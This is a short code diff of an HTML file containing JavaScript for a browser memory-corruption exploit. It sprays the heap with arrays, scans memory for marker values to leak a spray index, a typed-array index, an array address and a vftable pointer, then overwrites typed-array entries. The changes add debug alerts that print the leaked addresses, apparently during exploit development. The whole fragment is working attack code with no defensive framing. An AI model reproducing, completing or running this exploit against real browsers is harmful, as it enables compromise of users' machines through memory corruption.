--- a/array.html
+++ b/array.html
@@ -1,5 +1,5 @@
 <script>	
-alert("start22");
+alert("start23");
 var spray=new Array(0x800);
 var tmp;
  for(var i=0;i<spray.length;i++){
@@ -92,7 +92,9 @@ while(s1.charCodeAt(a)!=0xAA00){
  a+=1;
 }
 var spray_index=s1.charCodeAt(a-1);
-var typedarray_index=s1.charCodeAt(a+1);
+alert(spray_index.toString(16));
+ var typedarray_index=s1.charCodeAt(a+1);
+ alert(typedarray_index.toString(16));
 a=0x50010000/2;
 while(s1.charCodeAt(a)!=0xFFFB){
  a+=1;
@@ -101,7 +103,7 @@ var arr_addr=(s1.charCodeAt(a-1)<<16)+s1.charCodeAt(a-2)
 alert(arr_addr.toString(16));
 a=arr_addr/2;
 var vftable=s1.charCodeAt(a)+(s1.charCodeAt(a+1)<<16);
-//alert(vftable.toString(16));
+alert(vftable.toString(16));
 for(var i=typedarray_index;i<typedarray_index+0x40/4;i++){
  spray[spray_index][i]=0;
 }
